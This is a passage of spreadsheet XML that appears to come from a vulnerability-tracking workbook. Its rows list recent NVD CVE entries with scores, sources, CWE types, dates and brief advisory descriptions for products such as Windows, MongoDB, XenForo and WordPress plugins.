t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P859" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q859" s="5" t="inlineStr" /><c r="R859" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S859" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t></is></c></row><row r="860"><c r="A860" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B860" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C860" s="5" t="inlineStr"><is><t>CVE-2026-69706</t></is></c><c r="D860" s="5" t="n"><v>7.1</v></c><c r="E860" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F860" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G860" s="5" t="inlineStr" /><c r="H860" s="5" t="n"><v>0.004</v></c><c r="I860" s="5" t="inlineStr" /><c r="J860" s="5" t="inlineStr" /><c r="K860" s="5" t="inlineStr" /><c r="L860" s="5" t="inlineStr" /><c r="M860" s="5" t="inlineStr" /><c r="N860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O860" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P860" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q860" s="5" t="inlineStr" /><c r="R860" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S860" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t></is></c></row><row r="861"><c r="A861" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B861" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C861" s="5" t="inlineStr"><is><t>CVE-2026-69757</t></is></c><c r="D861" s="5" t="n"><v>7.1</v></c><c r="E861" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F861" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G861" s="5" t="inlineStr" /><c r="H861" s="5" t="n"><v>0.007</v></c><c r="I861" s="5" t="inlineStr" /><c r="J861" s="5" t="inlineStr" /><c r="K861" s="5" t="inlineStr" /><c r="L861" s="5" t="inlineStr" /><c r="M861" s="5" t="inlineStr" /><c r="N861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O861" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P861" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q861" s="5" t="inlineStr" /><c r="R861" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S861" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t></is></c></row><row r="862"><c r="A862" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C862" s="5" t="inlineStr"><is><t>CVE-2026-69761</t></is></c><c r="D862" s="5" t="n"><v>7.1</v></c><c r="E862" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F862" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G862" s="5" t="inlineStr" /><c r="H862" s="5" t="n"><v>0.005</v></c><c r="I862" s="5" t="inlineStr" /><c r="J862" s="5" t="inlineStr" /><c r="K862" s="5" t="inlineStr" /><c r="L862" s="5" t="inlineStr" /><c r="M862" s="5" t="inlineStr" /><c r="N862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P862" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q862" s="5" t="inlineStr" /><c r="R862" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S862" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t></is></c></row><row r="863"><c r="A863" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C863" s="5" t="inlineStr"><is><t>CVE-2026-69775</t></is></c><c r="D863" s="5" t="n"><v>7.1</v></c><c r="E863" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F863" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G863" s="5" t="inlineStr" /><c r="H863" s="5" t="n"><v>0.005</v></c><c r="I863" s="5" t="inlineStr" /><c r="J863" s="5" t="inlineStr" /><c r="K863" s="5" t="inlineStr" /><c r="L863" s="5" t="inlineStr" /><c r="M863" s="5" t="inlineStr" /><c r="N863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P863" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q863" s="5" t="inlineStr" /><c r="R863" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S863" s="5" t="inlineStr"><is><t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t></is></c></row><row r="864"><c r="A864" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B864" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C864" s="5" t="inlineStr"><is><t>CVE-2026-73321</t></is></c><c r="D864" s="5" t="n"><v>7.1</v></c><c r="E864" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F864" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G864" s="5" t="inlineStr" /><c r="H864" s="5" t="n"><v>0.004</v></c><c r="I864" s="5" t="inlineStr" /><c r="J864" s="5" t="inlineStr" /><c r="K864" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L864" s="5" t="inlineStr" /><c r="M864" s="5" t="inlineStr" /><c r="N864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O864" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P864" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q864" s="5" t="inlineStr" /><c r="R864" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S864" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t></is></c><c r="T864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t></is></c></row><row r="865"><c r="A865" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B865" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C865" s="5" t="inlineStr"><is><t>CVE-2026-81781</t></is></c><c r="D865" s="5" t="n"><v>7.1</v></c><c r="E865" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F865" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G865" s="5" t="inlineStr" /><c r="H865" s="5" t="n"><v>0.002</v></c><c r="I865" s="5" t="inlineStr" /><c r="J865" s="5" t="inlineStr" /><c r="K865" s="5" t="inlineStr" /><c r="L865" s="5" t="inlineStr" /><c r="M865" s="5" t="inlineStr" /><c r="N865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q865" s="5" t="inlineStr" /><c r="R865" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S865" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t></is></c><c r="T865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t></is></c></row><row r="866"><c r="A866" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C866" s="5" t="inlineStr"><is><t>CVE-2026-81798</t></is></c><c r="D866" s="5" t="n"><v>7.1</v></c><c r="E866" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F866" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G866" s="5" t="inlineStr" /><c r="H866" s="5" t="n"><v>0.001</v></c><c r="I866" s="5" t="inlineStr" /><c r="J866" s="5" t="inlineStr" /><c r="K866" s="5" t="inlineStr" /><c r="L866" s="5" t="inlineStr" /><c r="M866" s="5" t="inlineStr" /><c r="N866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q866" s="5" t="inlineStr" /><c r="R866" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S866" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.

This issue affects Easy Appointments: from n/a through 4.0.2.1.</t></is></c><c r="T866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t></is></c></row><row r="867"><c r="A867" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C867" s="5" t="inlineStr"><is><t>CVE-2026-82052</t></is></c><c r="D867" s="5" t="n"><v>7.1</v></c><c r="E867" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F867" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G867" s="5" t="inlineStr" /><c r="H867" s="5" t="n"><v>0.004</v></c><c r="I867" s="5" t="inlineStr" /><c r="J867" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K867" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L867" s="5" t="inlineStr" /><c r="M867" s="5" t="inlineStr" /><c r="N867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O867" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P867" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q867" s="5" t="inlineStr" /><c r="R867" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S867" s="5" t="inlineStr"><is><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is></c><c r="T867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t></is></c></row><row r="868"><c r="A868" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C868" s="5" t="inlineStr"><is><t>CVE-2026-82054</t></is></c><c r="D868" s="5" t="n"><v>7.1</v></c><c r="E868" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F868" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G868" s="5" t="inlineStr" /><c r="H868" s="5" t="n"><v>0.003</v></c><c r="I868" s="5" t="inlineStr" /><c r="J868" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K868" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L868" s="5" t="inlineStr" /><c r="M868" s="5" t="inlineStr" /><c r="N868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P868" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q868" s="5" t="inlineStr" /><c r="R868" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S868" s="5" t="inlineStr"><is><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is></c><c r="T868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t></is></c></row><row r="869"><c r="A869" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C869" s="5" t="inlineStr"><is><t>CVE-2026-82055</t></is></c><c r="D869" s="5" t="n"><v>7.1</v></c><c r="E869" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F869" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G869" s="5" t="inlineStr" /><c r="H869" s="5" t="n"><v>0.003</v></c><c r="I869" s="5" t="inlineStr" /><c r="J869" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K869" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L869" s="5" t="inlineStr" /><c r="M869" s="5" t="inlineStr" /><c r="N869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P869" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q869" s="5" t="inlineStr" /><c r="R869" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S869" s="5" t="inlineStr"><is><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is></c><c r="T869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t></is></c></row><row r="870"><c r="A870" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C870" s="5" t="inlineStr"><is><t>CVE-2026-82057</t></is></c><c r="D870" s="5" t="n"><v>7.1</v></c><c r="E870" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F870" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G870" s="5" t="inlineStr" /><c r="H870" s="5" t="n"><v>0.003</v></c><c r="I870" s="5" t="inlineStr" /><c r="J870" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K870" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L870" s="5" t="inlineStr" /><c r="M870" s="5" t="inlineStr" /><c r="N870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P870" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q870" s="5" t="inlineStr" /><c r="R870" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S870" s="5" t="inlineStr"><is><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is></c><c r="T870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t></is></c></row><row r="871"><c r="A871" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C871" s="5" t="inlineStr"><is><t>CVE-2026-82058</t></is></c><c r="D871" s="5" t="n"><v>7.1</v></c><c r="E871" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F871" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G871" s="5" t="inlineStr" /><c r="H871" s="5" t="n"><v>0.003</v></c><c r="I871" s="5" t="inlineStr" /><c r="J871" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K871" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L871" s="5" t="inlineStr" /><c r="M871" s="5" t="inlineStr" /><c r="N871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P871" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q871" s="5" t="inlineStr" /><c r="R871" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S871" s="5" t="inlineStr"><is><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is></c><c r="T871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t></is></c></row><row r="872"><c r="A872" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C872" s="5" t="inlineStr"><is><t>CVE-2026-82065</t></is></c><c r="D872" s="5" t="n"><v>7.1</v></c><c r="E872" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F872" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G872" s="5" t="inlineStr" /><c r="H872" s="5" t="n"><v>0.003</v></c><c r="I872" s="5" t="inlineStr" /><c r="J872" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K872" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L872" s="5" t="inlineStr" /><c r="M872" s="5" t="inlineStr" /><c r="N872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P872" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q872" s="5" t="inlineStr" /><c r="R872" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S872" s="5" t="inlineStr"><is><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is></c><c r="T872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t></is></c></row><row r="873"><c r="A873" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C873" s="5" t="inlineStr"><is><t>CVE-2026-82068</t></is></c><c r="D873" s="5" t="n"><v>7.1</v></c><c r="E873" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F873" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G873" s="5" t="inlineStr" /><c r="H873" s="5" t="n"><v>0.003</v></c><c r="I873" s="5" t="inlineStr" /><c r="J873" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K873" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L873" s="5" t="inlineStr" /><c r="M873" s="5" t="inlineStr" /><c r="N873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P873" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q873" s="5" t="inlineStr" /><c r="R873" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S873" s="5" t="inlineStr"><is><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is></c><c r="T873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t></is></c></row><row r="874"><c r="A874" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C874" s="5" t="inlineStr"><is><t>CVE-2026-82070</t></is></c><c r="D874" s="5" t="n"><v>7.1</v></c><c r="E874" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F874" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G874" s="5" t="inlineStr" /><c r="H874" s="5" t="n"><v>0.002</v></c><c r="I874" s="5" t="inlineStr" /><c r="J874" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K874" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L874" s="5" t="inlineStr" /><c r="M874" s="5" t="inlineStr" /><c r="N874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P874" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q874" s="5" t="inlineStr" /><c r="R874" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S874" s="5" t="inlineStr"><is><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is></c><c r="T874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t></is></c></row><row r="875"><c r="A875" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C875" s="5" t="inlineStr"><is><t>CVE-2026-82073</t></is></c><c r="D875" s="5" t="n"><v>7.1</v></c><c r="E875" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F875" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G875" s="5" t="inlineStr" /><c r="H875" s="5" t="n"><v>0.003</v></c><c r="I875" s="5" t="inlineStr" /><c r="J875" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K875" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L875" s="5" t="inlineStr" /><c r="M875" s="5" t="inlineStr" /><c r="N875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P875" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q875" s="5" t="inlineStr" /><c r="R875" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S875" s="5" t="inlineStr"><is><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is></c><c r="T875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t></is></c></row><row r="876"><c r="A876" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C876" s="5" t="inlineStr"><is><t>CVE-2026-82074</t></is></c><c r="D876" s="5" t="n"><v>7.1</v></c><c r="E876" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F876" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G876" s="5" t="inlineStr" /><c r="H876" s="5" t="n"><v>0.002</v></c><c r="I876" s="5" t="inlineStr" /><c r="J876" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K876" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L876" s="5" t="inlineStr" /><c r="M876" s="5" t="inlineStr" /><c r="N876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P876" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q876" s="5" t="inlineStr" /><c r="R876" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S876" s="5" t="inlineStr"><is><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is></c><c r="T876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t></is></c></row><row r="877"><c r="A877" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C877" s="5" t="inlineStr"><is><t>CVE-2026-82076</t></is></c><c r="D877" s="5" t="n"><v>7.1</v></c><c r="E877" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F877" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G877" s="5" t="inlineStr" /><c r="H877" s="5" t="n"><v>0.003</v></c><c r="I877" s="5" t="inlineStr" /><c r="J877" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K877" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L877" s="5" t="inlineStr" /><c r="M877" s="5" t="inlineStr" /><c r="N877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P877" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q877" s="5" t="inlineStr" /><c r="R877" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S877" s="5" t="inlineStr"><is><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is></c><c r="T877" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t></is></c></row><row r="878"><c r="A878" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C878" s="5" t="inlineStr"><is><t>CVE-2026-84817</t></is></c><c r="D878" s="5" t="n"><v>7.1</v></c><c r="E878" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F878" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G878" s="5" t="inlineStr" /><c r="H878" s="5" t="n"><v>0.001</v></c><c r="I878" s="5" t="inlineStr" /><c r="J878" s="5" t="inlineStr" /><c r="K878" s="5" t="inlineStr" /><c r="L878" s="5" t="inlineStr" /><c r="M878" s="5" t="inlineStr" /><c r="N878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q878" s="5" t="inlineStr" /><c r="R878" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S878" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t></is></c><c r="T878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t></is></c></row><row r="879"><c r="A879" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C879" s="5" t="inlineStr"><is><t>CVE-2026-84818</t></is></c><c r="D879" s="5" t="n"><v>7.1</v></c><c r="E879" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F879" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G879" s="5" t="inlineStr" /><c r="H879" s="5" t="n"><v>0.001</v></c><c r="I879" s="5" t="inlineStr" /><c r="J879" s="5" t="inlineStr" /><c r="K879" s="5" t="inlineStr" /><c r="L879" s="5" t="inlineStr" /><c r="M879" s="5" t="inlineStr" /><c r="N879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q879" s="5" t="inlineStr" /><c r="R879" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S879" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t></is></c><c r="T879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t></is></c></row><row r="880"><c r="A880" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C880" s="5" t="inlineStr"><is><t>CVE-2026-84820</t></is></c><c r="D880" s="5" t="n"><v>7.1</v></c><c r="E880" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F880" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G880" s="5" t="inlineStr" /><c r="H880" s="5" t="n"><v>0.001</v></c><c r="I880" s="5" t="inlineStr" /><c r="J880" s="5" t="inlineStr" /><c r="K880" s="5" t="inlineStr" /><c r="L880" s="5" t="inlineStr" /><c r="M880" s="5" t="inlineStr" /><c r="N880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q880" s="5" t="inlineStr" /><c r="R880" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S880" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t></is></c><c r="T880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t></is></c></row><row r="881"><c r="A881" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C881" s="5" t="inlineStr"><is><t>CVE-2026-86074</t></is></c><c r="D881" s="5" t="n"><v>7.1</v></c><c r="E881" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G881" s="5" t="inlineStr" /><c r="H881" s="5" t="n"><v>0.003</v></c><c r="I881" s="5" t="inlineStr" /><c r="J881" s="5" t="inlineStr" /><c r="K881" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L881" s="5" t="inlineStr" /><c r="M881" s="5" t="inlineStr" /><c r="N881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P881" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q881" s="5" t="inlineStr" /><c r="R881" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S881" s="5" t="inlineStr"><is><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is></c><c r="T881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t></is></c></row><row r="882"><c r="A882" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C882" s="5" t="inlineStr"><is><t>CVE-2026-86081</t></is></c><c r="D882" s="5" t="n"><v>7.1</v></c><c r="E882" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F882" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G882" s="5" t="inlineStr" /><c r="H882" s="5" t="n"><v>0.003</v></c><c r="I882" s="5" t="inlineStr" /><c r="J882" s="5" t="inlineStr" /><c r="K882" s="5" t="inlineStr" /><c r="L882" s="5" t="inlineStr" /><c r="M882" s="5" t="inlineStr" /><c r="N882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c 